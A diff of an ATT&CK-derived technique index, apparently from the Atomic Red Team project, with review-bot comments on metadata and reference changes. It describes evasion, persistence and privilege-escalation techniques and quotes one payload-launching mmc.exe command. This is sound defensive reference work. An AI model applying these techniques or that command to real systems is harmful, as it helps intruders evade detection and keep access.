+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
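Review bot: the `Microsoft XSLT Script Mar 2017` reference description on the `+` side still reads `XSLT Stylesheet Scripting Using .` with nothing after `Using`; it was already truncated on the `-` side, and the linked Microsoft page's title ends in an angle-bracketed element name at that position, so the generator's markup stripping is the likely culprit. Worth checking that the stripping step escapes angle-bracketed text instead of deleting it, since the same treatment would silently eat any tag-like token in a description. The Twitter reference moving to `https://x.com/dez_/status/986614411711442944` with a 2024 retrieval date is fine.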
@@ -13737,7 +14025,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
@@ -13765,48 +14053,11 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests: []
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13815,6 +14066,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -13823,20 +14077,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
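Review bot: `x_mitre_permissions_required:` / `- User` is removed outright from T1578.001 (the two `-` lines after the data sources) with nothing added in its place, while the platform, domain and contributor fields around it are only moved. If that mirrors the upstream object, fine, but it is a real content change hiding inside a reorder, so call it out in the PR description. Also, the Mandiant M-Trends 2020 reference URL changes from content.fireeye.com to a mandiant.com PDF; please verify the new link resolves before merging.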
@@ -13893,6 +14178,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13903,13 +14189,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -13968,11 +14253,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -14012,8 +14296,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -14021,13 +14307,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -14058,9 +14344,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1480.001:
@@ -14121,7 +14404,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14143,11 +14426,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14214,8 +14496,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14233,7 +14515,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -14336,12 +14617,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14354,6 +14634,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -14390,17 +14671,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -14446,9 +14727,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -14486,7 +14764,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14505,7 +14783,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -14536,7 +14813,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14560,12 +14837,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14649,7 +14924,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -14671,7 +14945,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -14705,12 +14979,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14762,9 +15034,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1211:
@@ -14833,7 +15104,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -14880,7 +15150,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -14893,12 +15163,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
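Review bot: Two data sources ('Module: Module Load', 'Process: Process Metadata') are added to T1127 while `x_mitre_attack_spec_version` stays at 2.1.0 and, in the previous hunk, `modified` moved back to 2022-05-05. A content change to the data-source list would normally come with an `x_mitre_version` bump; that field is not in the hunk's context, so please check whether it was bumped upstream or whether the object is being assembled from two different bundle versions.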
@@ -14977,7 +15248,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14999,7 +15270,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -15042,7 +15312,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15066,8 +15336,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -15115,7 +15383,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15153,8 +15421,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -15203,7 +15469,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15255,29 +15521,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
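Review bot: The rewritten description introduces two new citation tags, "(Citation: Stack Overflow)" and "(Citation: Red Canary - Atomic Red Team)"; these resolve by exact string match against `source_name` entries, so the entries added to `external_references` later in this object must match character for character, including the spaced hyphen in "Red Canary - Atomic Red Team". Note also that the sentence about the deprecated `at` utility (the `- though at.exe` ... `- or the Control Panel.` lines) is removed without a replacement on the `+` side; the unmarked fragment "can not access tasks created with schtasks" between the two removed lines should be checked against the raw YAML to make sure it is a rendering artifact and not a stray line left in the regenerated file.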
@@ -15324,7 +15589,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -15356,8 +15621,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15371,6 +15636,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
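Review bot: The new "Red Canary - Atomic Red Team" source points at this repository's own `atomics/T1053.005/T1053.005.md` on `master`, so the upstream ATT&CK description now cites the very file this index is generated from, and because the path tracks `master` the content backing the `Invoke-CimMethod` / `PS_ScheduledTask` claim can drift from what the description says. A commit-pinned URL would be stable; since this index mirrors upstream, that is a point to raise with ATT&CK rather than patch here, but it is worth a line in the PR description.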
@@ -15383,11 +15652,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
@@ -15453,7 +15725,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -15542,7 +15813,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
